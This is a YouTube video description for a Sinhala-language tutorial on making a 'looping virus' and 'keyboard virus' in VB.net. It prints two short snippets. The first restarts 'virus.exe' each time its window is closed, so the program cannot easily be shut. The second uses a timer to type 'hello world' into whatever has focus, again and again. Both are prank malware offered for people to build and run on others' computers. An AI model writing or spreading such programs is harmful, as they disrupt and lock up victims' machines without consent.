How to Make a Looping Virus & Keyboard Virus Using VB.net | MyBot Official | Sinhala Tutorial
Channel:
Subscribers:
7,740
Published on ● Video Link: https://www.youtube.com/watch?v=Awmizl-sUi4
In this video we are talking about how to make a looping virus & keyboard virus using vb.net.
Code :-
1) :-
Public Class Form1
Private Sub Form1_FormClosing(ByVal sender As Object, ByVal e As System.Windows.Forms.FormClosingEventArgs) Handles Me.FormClosing
Shell("virus.exe")
End Sub
End Class
2) :- Public Class Form1
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
My.Computer.Keyboard.SendKeys("hello world")
End Sub
End Class
Other Videos By MyBot Official
Tags:
my
bot
mybot
official
virus
vb.net
looping
keyboard